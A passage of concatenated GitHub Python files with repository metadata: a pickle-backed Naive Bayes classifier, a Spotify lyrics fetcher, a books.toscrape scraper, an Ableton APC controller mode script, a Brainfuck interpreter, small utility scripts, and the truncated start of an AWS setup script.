utf-8\n\nimport pickle\n\nfrom nltk.classify.naivebayes import NaiveBayesClassifier\n\n\nclass ClassifierModel():\n \"\"\"\n Modelo de Classificador NaiveBayes\n\n Attributes\n -----\n classifier: NaiveBayesClassifier\n uniqueWords: list [string]\n \"\"\"\n \n classifier: NaiveBayesClassifier = None\n uniqueWords: list = []\n\n def __init__(self):\n \"\"\"\n Construtor do Modelo: Verifica os modelos salvos e o carrega se existir.\n \"\"\"\n\n self.getModelSaved()\n \n def getModelSaved(self):\n \"\"\"\n Carregar Modelo Salvo anteriormente se existir\n \"\"\"\n\n try:\n f = open('classifier/export/impartiality_discovery_unique_words.pickle', 'rb')\n self.uniqueWords = pickle.load(f)\n f.close()\n\n f = open('classifier/export/impartiality_discovery_classifier.pickle', 'rb')\n self.classifier = pickle.load(f)\n f.close()\n \n except:\n print('classifier/impartiality_discovery pickle files not found')\n \n def saveModel(self):\n \"\"\"\n Salvar Progresso do Modelo em arquivo pickle\n \"\"\"\n\n f = open('classifier/export/impartiality_discovery_unique_words.pickle', 'wb')\n pickle.dump(list(self.uniqueWords), f)\n f.close()\n\n f = open('classifier/export/impartiality_discovery_classifier.pickle', 'wb')\n pickle.dump(self.classifier, f)\n f.close()\n ","repo_name":"JosueSantos/impartiality_discovery","sub_path":"classifier/ClassifierModel.py","file_name":"ClassifierModel.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1631983940","text":"import requests\nfrom bs4 import BeautifulSoup\nimport time\nimport io\nimport subprocess as sp\nimport re\nimport os\nfrom sys import platform\nimport spotilib\n\n\ndef got_lyrics():\n\tif os.path.exists('lyrics.txt') and os.stat('lyrics.txt').st_size > 30:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef from_plyrics(artist, song):\n\tartist = re.sub('[^a-z]+', '', artist)\n\tsong = re.sub('[^a-z]+', '', song)\n\turl = 'http://www.plyrics.com/lyrics/' + artist + '/' + song + '.html'\n\tprint(\"Fetching the lyrics from \" + url)\n\tr = requests.get(url)\n\tr.encoding = 'utf-8'\n\trt = r.text\n\tlyrics = rt[rt.find(''):rt.find('')][26:]\n\tsoup = BeautifulSoup(lyrics, \"lxml\")\n\ttext = soup.get_text()\n\twith io.open('lyrics.txt', 'w', encoding='utf-8') as f:\n\t\tf.write(text)\n\n\ndef from_tekstowo(artist, song):\n\tartist = artist.replace(\" \", \"_\")\n\tartist = re.sub('[^a-z_]+', '', artist)\n\tsong = song.replace(\" \", \"_\")\n\tsong = re.sub('[^a-z_]+', '', song)\n\turl = 'http://www.tekstowo.pl/piosenka,' + artist + ',' + song + '.html'\n\tprint(\"Fetching the lyrics from \" + url)\n\tr = requests.get(url)\n\tr.encoding = 'utf-8'\n\trt = r.text\n\tlyrics = rt[rt.find('Tekst piosenki:'):rt.find('Poznaj histori')][50:]\n\tsoup = BeautifulSoup(lyrics, \"lxml\")\n\ttext = soup.get_text()\n\twith io.open('lyrics.txt', 'w', encoding='utf-8') as f:\n\t\tf.write(text)\n\n\ndef get_new_lyrics(artist, song, proc):\n\tfrom_plyrics(artist, song)\n\tif not got_lyrics():\n\t\tfrom_tekstowo(artist, song)\n\t\tif not got_lyrics():\n\t\t\tif os.path.exists('lyrics.txt'):\n\t\t\t\tos.remove('lyrics.txt')\n\t\t\tprint(\"Lyrics unavailable\")\n\tif proc is not None:\n\t\tproc.kill()\n\tif os.path.exists('lyrics.txt'):\n\t\tprint(\"Fetched successfully\")\n\t\tif platform.startswith('linux'):\n\t\t\tproc = sp.Popen([\"gedit\", \"lyrics.txt\"])\n\t\telif platform.startswith('win'):\n\t\t\tproc = sp.Popen([\"notepad.exe\", \"lyrics.txt\"])\n\treturn artist, song, proc\n\nac, sc = ('',)*2\npc = None\nif os.path.exists('lyrics.txt'):\n\tos.remove('lyrics.txt')\n\nwhile True:\n\ta = spotilib.artist().lower()\n\ta = a.replace(\"é\", \"e\")\n\tif a[:3] == \"the\":\n\t\ta = a[3:]\n\ts = spotilib.song().lower()\n\tif a != ac or s != sc:\n\t\tprint(spotilib.song_info())\n\t\tac, sc, pc = get_new_lyrics(a, s, pc)\n\t\tprint()\n\ttime.sleep(1)\n","repo_name":"Existanza/spot","sub_path":"spot.py","file_name":"spot.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30287429520","text":"from ast import Num\nimport csv\nfrom unicodedata import category\nimport urllib.request as urllib2\nfrom bs4 import BeautifulSoup\nimport os\n\n# Parameter of the function:\n# - url = url of the image (str).\n# - name = title of the book.\n\ndef download_image(url,name):\n # remove all the character except num and letter\n s = ''.join(ch for ch in name if ch.isalnum())+'.jpg';\n \n # Create a directory image\n if not os.path.exists('image'):\n os.makedirs('image');\n \n # Save the image in the directory image \n urllib2.urlretrieve(url,'image/'+s);s\n #print('Image Dowloaded succesfully');\n\n\ndef bookDataRetrieve(quote_page,root_url):\n \n page = urllib2.urlopen(quote_page);\n soup = BeautifulSoup(page, 'html.parser');\n\n #retrieve path of the picture\n img_link = soup.find('img')['src'];\n img_link = img_link[6:];\n img_link = root_url + img_link;\n # Keep only the digit for the stock available.\n availableTxt = soup.findAll('td')[5].get_text();\n stock = [];\n for s in availableTxt.split('('):\n for t in s:\n if(t.isdigit()== True):\n stock.append(t)\n \n #Dictionnary where we stock all the data needed for a book.\n book_data = {\n 'product_page': quote_page,\n 'universal_product_code': soup.findAll('td')[0].get_text(),\n 'title': soup.find('h1').get_text(),\n 'price_including_tax': soup.findAll('td')[2].get_text(),\n 'price_excluding_tax': soup.findAll('td')[3].get_text(),\n 'number_available':\"\".join(stock),\n 'product_description':soup.findAll(\"p\")[3].get_text(),\n 'category':soup.findAll('a')[3].get_text(),\n 'review_rating':soup.findAll('td')[6].get_text(),\n 'image_url':img_link,\n }\n\n download_image(img_link,book_data['title']);\n \n \n \n print('All the data from '+ book_data['title'] + ' have been retrieved.')\n return book_data;\n \ndef categoryDataRetreiver(quote_page,root_url,quote_page_cat_root):\n page = urllib2.urlopen(quote_page);\n soup = BeautifulSoup(page, 'html.parser');\n page_num = soup.find_all('a')[-1].get_text();\n \n url_book_list = [];\n category_book_data = [];\n temp_cat_list = [];\n\n\n for x in soup.find_all('div', class_='image_container'):\n url = x.find('a')['href'][9:];\n url = root_url +'catalogue/'+ url;\n category_book_data.append(bookDataRetrieve(url,root_url));\n url_book_list.append(url);\n \n if(page_num == 'previous'):\n return category_book_data;\n \n if(page_num == 'next'):\n temp_quote = quote_page_cat_root + soup.find_all('a')[-1]['href'];\n temp_cat_list = categoryDataRetreiver(temp_quote,root_url,quote_page_cat_root);\n category_book_data.extend(temp_cat_list);\n return category_book_data;\n\ndef URLcategoryfunction(soup):\n url_cat_list = [];\n root_url_cat_list = [];\n cat_txt =[];\n\n for x in soup.find('ul', class_='nav nav-list').find_all('li'):\n url_temp1 = x.find('a')['href'];\n cat_txt.append(x.get_text())\n url_cat_list.append(url_temp1);\n url_temp2 = url_temp1.replace('index.html','');\n root_url_cat_list.append(url_temp2)\n\n del url_cat_list[0]\n del root_url_cat_list[0]\n del cat_txt[0]\n return url_cat_list,root_url_cat_list,cat_txt;\n\n####### Script ##########\n\nroot_url = 'http://books.toscrape.com/';\n#quote_page = 'http://books.toscrape.com/catalogue/full-moon-over-noahs-ark-an-odyssey-to-mount-ararat-and-beyond_811/index.html';\n#quote_page2 = 'http://books.toscrape.com/catalogue/category/books/travel_2/index.html';\n#quote_page_cat_root = 'http://books.toscrape.com/catalogue/category/books/travel_2/';\n\npage = urllib2.urlopen(root_url);\nsoup = BeautifulSoup(page, 'html.parser');\n\nurl_cat_list, root_url_cat_list, cat_txt = URLcategoryfunction(soup);\nif not os.path.exists('book'):\n os.makedirs('book');\n\nfor x in url_cat_list:\n print('Currently working in the following link : ',root_url + x)\n csv_header = ['product_page','universal_product_code',\n 'title','price_including_tax','price_excluding_tax',\n 'number_available','product_description',\n 'category','review_rating','image_url'];\n cat_name = cat_txt[url_cat_list.index(x)].replace('\\n','').replace(' ',\"\");\n \n with open('./book/'+ cat_name +'.csv', 'w',encoding=\"utf-8\", newline='') as csvfile:\n dict_writer = csv.DictWriter(csvfile,fieldnames=csv_header, dialect = csv.excel) \n dict_writer.writeheader() \n \n page_book_list = categoryDataRetreiver(root_url + x,root_url,root_url + root_url_cat_list[url_cat_list.index(x)]);\n print('There are '+ str(len(page_book_list))+' books in the '+ cat_name +' category')\n for x in range(len(page_book_list)):\n dict_writer.writerow(page_book_list[x])","repo_name":"MehdiTmz/OPR_Project_1","sub_path":"webScrapeTest.py","file_name":"webScrapeTest.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25131463481","text":"from _Framework.ModeSelectorComponent import ModeSelectorComponent \nfrom _Framework.ButtonElement import ButtonElement \nfrom _Framework.MixerComponent import MixerComponent \nfrom _Framework.ButtonMatrixElement import ButtonMatrixElement\nfrom _Framework.ControlSurface import ControlSurface\nfrom Matrix_Maps import *\nfrom VUMeters import VUMeters\n\nclass MatrixModesComponent(ModeSelectorComponent):\n ' SelectorComponent that assigns matrix to different functions '\n __module__ = __name__\n\n def __init__(self, matrix, session, zooming, stop_buttons, parent):\n assert isinstance(matrix, ButtonMatrixElement)\n ModeSelectorComponent.__init__(self)\n self._controls = None\n self._session = session\n self._session_zoom = zooming\n self._matrix = matrix\n self._track_stop_buttons = stop_buttons\n self._stop_button_matrix = ButtonMatrixElement() #new dummy matrix for stop buttons, to allow note mode/user mode switching\n button_row = []\n for track_index in range(8):\n button = self._track_stop_buttons[track_index]\n button_row.append(button)\n self._stop_button_matrix.add_row(tuple(button_row))\n self._nav_left_button = None\n self._nav_right_button = None\n self._mode_index = 0\n self._last_mode = 0\n self._parent = parent\n self._parent.set_pad_translations(PAD_TRANSLATIONS) #comment out to remove Drum Rack mapping\n self._vu = None\n self._shift_button = self._parent._shift_button\n self._shift_button.add_value_listener(self._shift_value)\n\n \n def disconnect(self):\n for button in self._modes_buttons:\n button.remove_value_listener(self._mode_value)\n self._controls = None\n self._session = None\n self._session_zoom = None\n self._matrix = None\n self._track_stop_buttons = None\n self._stop_button_matrix = None\n self._shift_button.remove_value_listener(self._shift_value)\n ModeSelectorComponent.disconnect(self)\n\n \n def set_mode(self, mode): #override ModeSelectorComponent set_mode, to avoid flickers\n assert isinstance(mode, int)\n assert (mode in range(self.number_of_modes()))\n if (self._mode_index != mode):\n self._last_mode = 0 # self._mode_index # keep track of previous mode, to allow refresh after Note Mode only\n self._mode_index = mode\n self._set_modes()\n \n \n def set_mode_buttons(self, buttons):\n assert isinstance(buttons, (tuple,\n type(None)))\n for button in self._modes_buttons:\n button.remove_value_listener(self._mode_value)\n\n self._modes_buttons = []\n if (buttons != None):\n for button in buttons:\n assert isinstance(button, ButtonElement)\n identify_sender = True\n button.add_value_listener(self._mode_value, identify_sender)\n self._modes_buttons.append(button)\n for index in range(len(self._modes_buttons)):\n if (index == self._mode_index):\n self._modes_buttons[index].turn_on()\n else:\n self._modes_buttons[index].turn_off()\n\n\n def _mode_value(self, value, sender):\n assert (len(self._modes_buttons) > 0)\n assert isinstance(value, int)\n assert isinstance(sender, ButtonElement)\n assert (self._modes_buttons.count(sender) == 1)\n if self.is_enabled():\n if ((value is not 0) or (not sender.is_momentary())):\n self.set_mode(self._modes_buttons.index(sender)) \n\n def number_of_modes(self):\n return 8\n \n def update(self):\n pass\n\n def get_mode_index_value(self):\n return self._mode_index\n \n def _set_modes(self):\n if self.is_enabled():\n if self._vu != None:\n self._vu.disconnect()\n \n self._session.set_allow_update(False)\n self._session_zoom.set_allow_update(False)\n assert (self._mode_index in range(self.number_of_modes()))\n for index in range(len(self._modes_buttons)):\n if (index == self._mode_index):\n self._modes_buttons[index].turn_on()\n else:\n self._modes_buttons[index].turn_off()\n self._session.set_stop_track_clip_buttons(tuple(self._track_stop_buttons)) \n for track_index in range(8):\n button = self._track_stop_buttons[track_index]\n button.use_default_message()\n button.set_enabled(True)\n button.set_force_next_value()\n button.send_value(0)\n self._session_zoom.set_enabled(True)\n self._session.set_enabled(True)\n self._session.set_show_highlight(True)\n self._session_zoom.set_zoom_button(self._parent._shift_button)\n for scene_index in range(5):\n scene = self._session.scene(scene_index) \n for track_index in range(8): \n button = self._matrix.get_button(track_index, scene_index)\n button.use_default_message()\n clip_slot = scene.clip_slot(track_index)\n clip_slot.set_launch_button(button)\n button.set_enabled(True)\n \n if (self._mode_index == 0): #Clip Launch\n self._session_zoom._on_zoom_value(1) #zoom out\n\n \n elif (self._mode_index == 1): #Session Overview\n self._session_zoom.set_zoom_button(None)\n self._session_zoom.set_enabled(True)\n self._session_zoom._is_zoomed_out = True\n self._session_zoom._scene_bank_index = int(((self._session_zoom._session.scene_offset() / self._session_zoom._session.height()) / self._session_zoom._buttons.height())) \n self._session.set_enabled(False)\n self._session_zoom.update()\n\n \n elif (self._mode_index == 2):\n self._set_note_mode(PATTERN_1, CHANNEL_1, NOTEMAP_1, USE_STOP_ROW_1, IS_NOTE_MODE_1)\n elif (self._mode_index == 3):\n self._set_note_mode(PATTERN_2, CHANNEL_2, NOTEMAP_2, USE_STOP_ROW_2, IS_NOTE_MODE_2)\n elif (self._mode_index == 4):\n self._set_note_mode(PATTERN_3, CHANNEL_3, NOTEMAP_3, USE_STOP_ROW_3, IS_NOTE_MODE_3)\n elif (self._mode_index == 5):\n self._set_note_mode(PATTERN_4, CHANNEL_4, NOTEMAP_4, USE_STOP_ROW_4, IS_NOTE_MODE_4)\n elif (self._mode_index == 6):\n self._set_note_mode(PATTERN_5, CHANNEL_5, NOTEMAP_5, USE_STOP_ROW_5, IS_NOTE_MODE_5)\n elif (self._mode_index == 7):\n self._set_note_mode(PATTERN_6, CHANNEL_6, NOTEMAP_6, True, False)\n # VU Meters\n self._session.set_enabled(False)\n self._session_zoom._on_zoom_value(1) #zoom out\n self._session_zoom.set_enabled(True)\n self._session_zoom._is_zoomed_out = False\n self._session_zoom.set_zoom_button(self._parent._shift_button)\n self._session_zoom.update()\n self._update_vu_meters()\n\n else:\n pass\n self._session.set_allow_update(True)\n self._session_zoom.set_allow_update(True)\n #self._rebuild_callback()\n\n\n def _set_note_mode(self, pattern, channel, notemap, use_stop_row = False, is_note_mode = True):\n self._session_zoom.set_zoom_button(None)\n self._session_zoom.set_enabled(False)\n for scene_index in range(5):\n scene = self._session.scene(scene_index) \n for track_index in range(8):\n clip_slot = scene.clip_slot(track_index)\n button = self._matrix.get_button(track_index, scene_index)\n clip_slot.set_launch_button(None)\n button.set_channel(channel) #remap all Note Mode notes to new channel\n button.set_identifier(notemap[scene_index][track_index])\n button.set_on_off_values(pattern[scene_index][track_index], 0)\n button.set_force_next_value()\n button.turn_on()\n if is_note_mode == True:\n button.set_enabled(False)\n if use_stop_row == True:\n self._session.set_stop_track_clip_buttons(None)\n for track_index in range(8):\n button = self._stop_button_matrix.get_button(track_index, 0)\n button.set_channel(channel) #remap all Note Mode notes to new channel\n button.set_identifier(notemap[5][track_index])\n button.set_force_next_value()\n button.send_value(pattern[5][track_index])\n if is_note_mode == True:\n button.set_enabled(False)\n else:\n for track_index in range(8):\n button = self._stop_button_matrix.get_button(track_index, 0)\n button.send_value(0, True)\n self._session.set_enabled(True)\n self._session.set_show_highlight(True)\n\n\n def _on_track_offset_changed(self):\n if (self.is_enabled() and self._mode_index == 7):\n self._update_vu_meters()\n\n def _shift_value(self, value):\n if (self.is_enabled() and self._mode_index == 7 and self._vu != None):\n if value != 0:\n self._vu.disconnect()\n self._vu.disable()\n else:\n self._update_vu_meters()\n self._vu.enable()\n\n \n def _update_vu_meters(self):\n if self._vu == None:\n self._vu = VUMeters(self._parent)\n else:\n self._vu.disconnect()\n self._vu.observe( int(self._session_zoom._session.track_offset()) )\n\n \n\n# local variables:\n# tab-width: 4\n","repo_name":"matthewcieplak/APC_64_40_9","sub_path":"MatrixModesComponent.py","file_name":"MatrixModesComponent.py","file_ext":"py","file_size_in_byte":10053,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"52"} +{"seq_id":"27085745696","text":"__author__ = \"Erik Nyquist\"\n__license__ = \"Apache 2.0\"\n__version__ = \"1.0.4\"\n__maintainer__ = \"Erik Nyquist\"\n__email__ = \"eknyquist@gmail.com\"\n\n\nimport os\nimport sys\nimport time\n\nOPCODE_MOVE = 0\nOPCODE_LEFT = 1\nOPCODE_RIGHT = 2\nOPCODE_ADD = 3\nOPCODE_SUB = 4\nOPCODE_OPEN = 5\nOPCODE_CLOSE = 6\nOPCODE_INPUT = 7\nOPCODE_OUTPUT = 8\nOPCODE_CLEAR = 9\nOPCODE_COPY = 10\nOPCODE_SCANL = 11\nOPCODE_SCANR = 12\n\nopcode_map = {\n \"<\": OPCODE_LEFT,\n \">\": OPCODE_RIGHT,\n \"+\": OPCODE_ADD,\n \"-\": OPCODE_SUB,\n \"[\": OPCODE_OPEN,\n \"]\": OPCODE_CLOSE,\n \",\": OPCODE_INPUT,\n \".\": OPCODE_OUTPUT,\n}\n\n# Check for string type in Python 2x and 3x\ntry:\n isinstance(\"\", basestring)\n def _isstr(s):\n return isinstance(s, basestring)\nexcept NameError:\n def _isstr(s):\n return isinstance(s, str)\n\nclass BrainfuckSyntaxError(Exception):\n \"\"\"\n Raised when brainfuck source contains invalid syntax\n \"\"\"\n pass\n\nclass Opcode(object):\n \"\"\"\n Brainfuck intermediate representation opcode\n \"\"\"\n\n _name_map = {\n OPCODE_MOVE: \"move\",\n OPCODE_ADD: \"add\",\n OPCODE_SUB: \"sub\",\n OPCODE_OPEN: \"open\",\n OPCODE_CLOSE: \"close\",\n OPCODE_INPUT: \"input\",\n OPCODE_OUTPUT: \"output\",\n OPCODE_CLEAR: \"clear\",\n OPCODE_COPY: \"copy\",\n OPCODE_SCANL: \"scanl\",\n OPCODE_SCANR: \"scanr\"\n }\n\n def __init__(self, code, move=0, value=None):\n self.code = code\n self.value = value\n self.move = move\n\n def __str__(self):\n ret = '%s %d' % (self._name_map[self.code], self.move)\n if self.value is not None:\n ret += ' %s' % self.value\n\n return ret\n\ndef _raise_unmatched(brace):\n raise BrainfuckSyntaxError(\"Error: unmatched '\" + brace + \"' symbol\")\n\ndef _count_dupes_ahead(string, index):\n \"\"\"\n Counts the number of repeated characters in 'string', starting at 'index'\n \"\"\"\n\n ret = 0\n i = index\n end = len(string) - 1\n\n while (i < end) and (string[i + 1] == string[i]):\n i += 1\n ret += 1\n\n return ret\n\ndef _is_copyloop(program, size, index, ii):\n \"\"\"\n Detects a copy loop, or a multiply loop and returns equivalent opcodes\n \"\"\"\n\n # Copy/multiply loop must start with a decrement\n if (index > (size - 6)) or (program[index + 1] != \"-\"):\n return [], 0\n\n mult = 0\n depth = 0\n mults = {}\n i = index + 2\n\n # Consume the loop contents until the cell pointer movement changes\n # direction. Keep track of pointer movement, and the number of increments\n # at each cell, so we can create Opcodes to recreate the copy / multiply\n # operations performed by the loop\n while i < size:\n if program[i] in \"><\":\n if mult > 0:\n mults[depth] = mult\n mult = 0\n\n if program[i] == \"<\":\n break\n\n depth += 1\n\n elif program[i] == \"+\":\n mult += 1\n\n else:\n return [], 0\n\n i += 1\n\n # If no cell or pointer increments by now, this isn't a copy/multiply loop\n if (len(mults) == 0) or (depth == 0) or (i == (size - 1)):\n return [], 0\n\n ret = [Opcode(OPCODE_COPY, ii, mults)]\n\n # Consume all the pointer decrements until the end of the loop.\n # If we encounter any non-\"<\" characters in the loop at this stage,\n # this isn't a copy/multiply loop (at least, not one I want to mess with!)\n while (i < size) and (program[i] != \"]\"):\n if program[i] != \"<\":\n return [], 0\n\n depth -= 1\n i += 1\n\n if (depth != 0) or (i == (size - 1)):\n return [], 0\n\n return ret, (i - index) + 1\n\ndef _is_scanloop(program, size, index, ii):\n \"\"\"\n Detects a scan loop and returns equivalent opcodes\n \"\"\"\n\n if index < (size - 3):\n clr = program[index : index + 3]\n\n if clr == \"[>]\":\n return [Opcode(OPCODE_SCANR, ii)], 3\n\n elif clr == \"[<]\":\n return [Opcode(OPCODE_SCANL, ii)], 3\n\n return [], 0\n\ndef _is_clearloop(program, size, index, ii):\n \"\"\"\n Detects a clear loop and returns equivalent opcodes\n \"\"\"\n\n if index < (size - 3):\n clr = program[index : index + 3]\n if clr == \"[+]\" or clr == \"[-]\":\n return [Opcode(OPCODE_CLEAR, ii)], 3\n\n return [], 0\n\ndef _run_optimizers(program, size, index, ii):\n \"\"\"\n Runs all the loop optimizers on the current token, and returns\n the resulting opcodes of the first one that succeeds\n \"\"\"\n\n loop_opts = [\n _is_clearloop, _is_copyloop, _is_scanloop\n ]\n\n for opt in loop_opts:\n codes, chars = opt(program, size, index, ii)\n if chars > 0:\n return codes, chars\n\n return [], 0\n\ndef parse(program):\n \"\"\"\n Convert brainfuck source into some intermediate opcodes that take advantage of\n common brainfuck paradigms to execute more efficiently.\n\n Specifically:\n\n * Strip out whitespace and any other non-BF characters\n * Replace copy loops, multiply loops, clear loops and scan loops with\n a single opcode that acheives the same effect\n * Collapse sequences of repeated \"+\", \"-\", \">\" and \"<\" characters into\n a single opcode\n\n :param str program: Brainfuck source code\n :return: list of intermediate opcodes\n :rtype: [bfi.Opcode]\n \"\"\"\n\n left_positions = []\n opcodes = []\n\n program = ''.join(program.split())\n size = len(program)\n\n pi = 0\n ii = 0\n\n while pi < size:\n if program[pi] not in opcode_map:\n pi += 1\n continue\n\n opcode = opcode_map[program[pi]]\n\n if opcode == OPCODE_OPEN:\n # Optimize common loop constructs\n codes, chars = _run_optimizers(program, size, pi, ii)\n if chars > 0:\n opcodes.extend(codes)\n pi += chars\n ii = 0\n continue\n\n if ii != 0:\n opcodes.append(Opcode(OPCODE_MOVE, 0, ii))\n ii = 0\n\n # No optimization possible, treat as normal BF loop\n left_positions.append(len(opcodes))\n opcodes.append(Opcode(OPCODE_OPEN))\n\n elif opcode == OPCODE_CLOSE:\n if len(left_positions) == 0:\n _raise_unmatched(\"]\")\n\n left = left_positions.pop()\n right = len(opcodes)\n opcodes[left].value = right\n opcodes.append(Opcode(OPCODE_CLOSE, ii, left))\n ii = 0\n\n elif opcode in [OPCODE_INPUT, OPCODE_OUTPUT]:\n opcodes.append(Opcode(opcode_map[program[pi]], ii))\n ii = 0\n else:\n num = _count_dupes_ahead(program, pi)\n if opcode == OPCODE_LEFT:\n ii -= (num + 1)\n elif opcode == OPCODE_RIGHT:\n ii += (num + 1)\n else:\n opcodes.append(Opcode(opcode_map[program[pi]], ii, num + 1))\n ii = 0\n\n pi += num\n\n pi += 1\n\n if len(left_positions) != 0:\n _raise_unmatched('[')\n\n return opcodes\n\ndef execute(opcodes, input_data=None, time_limit=None, tape_size=30000,\n buffer_output=False, write_byte=None, read_byte=None):\n \"\"\"\n Execute a list of intermediate opcodes\n\n :param [Opcode] opcodes: opcodes to execute\n :param str input_data: input data\n :param float time_limit: execution time limit\n :param int tape_size: Brainfuck program tape size\n :param bool buffer_output: if True, any output generated by the Brainfuck \\\n program will be buffered and returned as a string\n :param callable write_byte: callback to implement custom output behaviour; whenever the '.' \\\n brainfuck opcode is used to output the contents of the current cell, the contents \\\n of the current cell will be passed to this function. Should accept one argument \\\n which is the byte to write as an integer, and return nothing. Overrides the \\\n 'buffer_output' argument.\n :param callable read_byte: callback to implement custom input behaviour; whenever the ',' \\\n brainfuck opcode is used to read input and put it into the current cell, this \\\n function will be called to obtain 1 byte of input. Should accept no arguments, \\\n and return the read byte as an integer. Overrides the 'input_data' argument.\n \"\"\"\n\n stdin_buf = None\n if input_data != None:\n stdin_buf = list(reversed(input_data))\n\n tape = bytearray(tape_size)\n size = len(opcodes)\n ret = []\n pi = 0\n ii = 0\n\n # Pre-bind printing function since we'll call it so frequently. This\n # *did* speed things up very slightly in my tests, could have been a\n # delusion, I'm leaving it in anyway...\n syswrite = sys.stdout.write\n sysflush = sys.stdout.flush\n\n def write_stdout(c):\n syswrite(chr(c))\n sysflush()\n\n def write_buf(c):\n ret.append(chr(c))\n\n def read_stdin():\n return ord(os.read(0, 1))\n\n def read_buf():\n if len(stdin_buf) > 0:\n return ord(stdin_buf.pop())\n\n return None\n\n if write_byte is not None:\n do_write = write_byte\n else:\n do_write = write_buf if buffer_output else write_stdout\n\n if read_byte is not None:\n do_read = read_byte\n else:\n do_read = read_stdin if stdin_buf is None else read_buf\n\n if time_limit:\n start = time.time()\n\n while ii < size:\n op = opcodes[ii]\n\n if op.code == OPCODE_MOVE:\n pi += op.value\n\n elif op.code == OPCODE_ADD:\n pi += op.move\n tape[pi] = (tape[pi] + op.value) % 256\n\n elif op.code == OPCODE_SUB:\n pi += op.move\n tape[pi] = (tape[pi] - op.value) % 256\n\n elif op.code == OPCODE_OPEN:\n pi += op.move\n if tape[pi] == 0:\n ii = op.value\n\n elif op.code == OPCODE_CLOSE:\n pi += op.move\n if tape[pi] != 0:\n ii = op.value - 1\n\n elif op.code == OPCODE_INPUT:\n pi += op.move\n ch = do_read()\n if (ch is not None) and (ch > 0):\n tape[pi] = ch\n\n elif op.code == OPCODE_OUTPUT:\n pi += op.move\n do_write(tape[pi])\n\n elif op.code == OPCODE_CLEAR:\n pi += op.move\n tape[pi] = 0\n\n elif op.code == OPCODE_COPY:\n pi += op.move\n if tape[pi] > 0:\n for off in op.value:\n index = pi + off\n tape[index] = (tape[index]\n + (tape[pi] * op.value[off])) % 256\n\n tape[pi] = 0\n\n elif op.code == OPCODE_SCANL:\n pi += op.move\n while pi > 0 and tape[pi] != 0:\n pi -= 1\n\n elif op.code == OPCODE_SCANR:\n pi += op.move\n while pi < (size - 1) and tape[pi] != 0:\n pi += 1\n\n ii += 1\n if time_limit and ((time.time() - start) >= time_limit):\n return None\n\n if (not buffer_output) or (write_byte is not None):\n return None\n\n return \"\".join(ret)\n\ndef interpret(program, input_data=None, time_limit=None, tape_size=30000,\n buffer_output=False, write_byte=None, read_byte=None):\n \"\"\"\n Interpret & execute a brainfuck program\n\n :param str program: Brainfuck source code\n :param str input_data: input data\n :param float time_limit: execution time limit\n :param int tape_size: Brainfuck program tape size\n :param bool buffer_output: if True, any output generated by the Brainfuck \\\n program will be buffered and returned as a string\n :param callable write_byte: callback to implement custom output behaviour; whenever the '.' \\\n brainfuck opcode is used to output the contents of the current cell, the contents \\\n of the current cell will be passed to this function. Should accept one argument \\\n which is the byte to write as an integer, and return nothing. Overrides the \\\n 'buffer_output' argument.\n :param callable read_byte: callback to implement custom input behaviour; whenever the ',' \\\n brainfuck opcode is used to read input and put it into the current cell, this \\\n function will be called to obtain 1 byte of input. Should accept no arguments, \\\n and return the read byte as an integer. Overrides the 'input_data' argument.\n \"\"\"\n\n if not _isstr(program):\n raise BrainfuckSyntaxError(\"expecting a string containing Brainfuck \"\n \"code. Got %s instead\" % type(program))\n\n opcodes = parse(program)\n return execute(opcodes, input_data, time_limit, tape_size, buffer_output, write_byte, read_byte)\n","repo_name":"eriknyquist/bfi","sub_path":"bfi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12730,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"73317195366","text":"count = 0\n\nfile = open('C:Users/dell/Documents/fille', 'r')\nfor line in file:\n words = line.split(\" \")\n\ncount = count + len(words)\n\nprint(\"Number of words present in given file\" + str(count));\n\nfile.close();","repo_name":"Ambrose23456/Zuri_Team","sub_path":"Basic Python/numOfWords.py","file_name":"numOfWords.py","file_ext":"py","file_size_in_byte":210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33483085050","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport surfaceProject.energycalculations.calcenergy as ce\n\n\"\"\" \nInputs 3D array f(image,atom,feature_vector) \n \nIn seperate figures the Ag and O atoms are plotted in the feature space (2D apace of surrounding atomic densies). \n\"\"\"\n \ndef plot_features(f):\n N_images, N_atoms = np.size(f,0), np.size(f,1)\n for i in range(N_images): # Iterate through images \n for j in range(N_atoms): # Iterate througt atoms in a specific image\n if f[i,j,2] == 47: # plot Ag\n plt.figure(1)\n plt.plot(f[i,j,0],f[i,j,1],\"o\",color=\"blue\")\n elif f[i,j,2] == 8: # plot O\n plt.figure(2)\n plt.plot(f[i,j,0],f[i,j,1],\"o\",color=\"red\")\n plt.figure(1)\n plt.title(\"Feature space of Ag atoms\")\n plt.xlabel(\"density of O atoms\")\n plt.ylabel(\"density of Ag atoms\")\n plt.figure(2)\n plt.title(\"Feature space of Ag atoms\")\n plt.xlabel(\"density of O atoms\")\n plt.ylabel(\"density of Ag atoms\")\n plt.show()\n","repo_name":"HenrikLundMortensen/surfaceProject","sub_path":"surfaceProject/FeatureVector/plot_features.py","file_name":"plot_features.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7111895834","text":"import logging\nfrom common.config import Configuration\nfrom common.ec2.vpc import Vpc, Vpcs\nfrom common.ec2.subnet import Subnet\nfrom common.ec2.security_group import SecurityGroup\nfrom common.ec2.route_table import RouteTable\nfrom common.ec2.internet_gateway import InternetGateway, InternetGateways\nfrom common.ec2.vpc_address import VpcAddress, VpcAddresses\nfrom common.ec2.nat_gateway import NatGateway, NatGateways\nfrom common.ec2.key_pair import KeyPair, KeyPairs\nfrom common.ec2.instance import Instance\n\nclass CreateAWSResources():\n def _getVpc() -> Vpc:\n vpc = Vpcs.getVpc(name=\"Project 1 VPC\", cidr_block='10.0.0.0/16')\n 